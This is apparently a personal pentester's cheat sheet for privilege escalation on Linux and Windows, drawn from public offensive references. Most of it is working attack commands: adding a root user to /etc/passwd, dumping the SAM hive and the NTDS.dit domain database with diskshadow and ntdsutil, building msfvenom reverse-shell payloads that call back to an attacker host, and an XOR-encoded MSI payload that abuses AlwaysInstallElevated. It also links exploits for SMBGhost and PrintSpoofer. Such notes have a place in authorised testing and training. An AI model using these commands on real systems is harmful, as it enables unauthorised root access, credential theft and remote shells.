# Privilege Escalation
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

- find files modified in the last 15 minutes
`find / -xdev -mmin -15 -type f -ls 2>/dev/null`

- "" accessed in the last 15 minutes
`find / -xdev -amin -15 -type f -ls 2>/dev/null`


---
* installed patches
`wmic qfe list`

---
permissions
check /etc/passwd and /etc/shadow if writable
`echo "root2:$(openssl passwd 'mrcake'):0:0:root:/root:/bin/bash" >> /etc/passwd`


`find / -xdev -type f -writable 2>/dev/null`


### SUID
* cp # https://gtfobins.github.io/gtfobins/cp/
LFILE=/etc/passwd 
echo "pwn:$(openssl passwd 'mrcake'):0:0:root:/root:/bin/bash" | cp /dev/stdin "$LFILE"

---

### Unquoted Service Path
# https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """



----
unquoted service path

C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe

---
it will try to run:
- C:\Program.exe
- C:\Program Files\Foxit.exe
- C:\Program Files\Foxit Software\Foxit.exe
- C:\Program Files\Foxit Software\Foxit Reader\Foxit.exe
- C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe

---

- windows-exploit-suggester
- sherlock
- winpeas*.exe (has more information than .bat version)
- windows-exploit-suggester-new-generation (wesng) https://github.com/bitsadmin/wesng
- check architecture (386, x64) -> 32 bits binaries are in certain path and 64 bits somewhere else # https://ss64.com/nt/syntax-64bit.html

|   | 32 bit folder | 64 bit folder |
|---|---|---|
| 32 bit session | C:\Windows\system32\ | C:\Windows\sysNative\ |
| 64 bit session | C:\Windows\sysWOW64\ 	 | C:\Windows\system32\ |

---
do not forget to prefix .\ to run binaries

--- windows 2k3 seimpersonate -> https://github.com/egre55/windows-kernel-exploits
https://github.com/Re4son/Churrasco 


--- windows 10 -> smbghost
https://github.com/danigargu/CVE-2020-0796
replace shellcode in exploit.cpp (line 204)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=8081 -f dll -f csharp


--- windows 10 + windows server 2016 + windows server 2019
https://github.com/itm4n/PrintSpoofer


--- serestoreprivilege
 Run EnableSeRestorePrivilege.ps1 to enable this privilege to our PowerShell session. We now have write access to C:\Windows\System32
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://github.com/xct/SeRestoreAbuse



 --- sebackupprivilege
echo 'set verbose onX' > script.txt
echo 'set metadata C:\Windows\Temp\meta.cabX' >> script.txt
echo 'set context clientaccessibleX' >> script.txt
echo 'set context persistentX' >> script.txt
echo 'begin backupX' >> script.txt
echo 'add volume C: alias cdriveX' >> script.txt
echo 'createX' >> script.txt
echo 'expose %cdrive% E:X' >> script.txt
echo 'end backupX' >> script.txt

diskshadow /s script.txt

dir e:\

robocopy /b e:\windows\ntds . ntds.dit

--- requires cmd interactive shell
ntdsutil
activate instance ntds
ifm
create full c:\ntdsutil
quit
quit

---
wbadmin start backup -backuptarget:\\$(iptun)\tools -include:c:\windows\ntds

--- sebackupprivilege
reg save hklm\sam sam.reg
reg save hklm\system system.reg

pypykatz registry --sam sam.reg system.reg

--- sebackupprivilege NTDS.dit
https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Copy-VSS.ps1
import-module .\Copy-VSS.ps1
Copy-VSS.ps1


---


--- Privileges -> Attack
https://github.com/gtworek/Priv2Admin


--- always install elevated
# Set the right arch!
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=80 --encoder x64/xor --iterations 9 --format msi --out AlwaysInstallElevated.msi
msiexec /quiet /qn /i c:\users\shenzi\alwe.msi	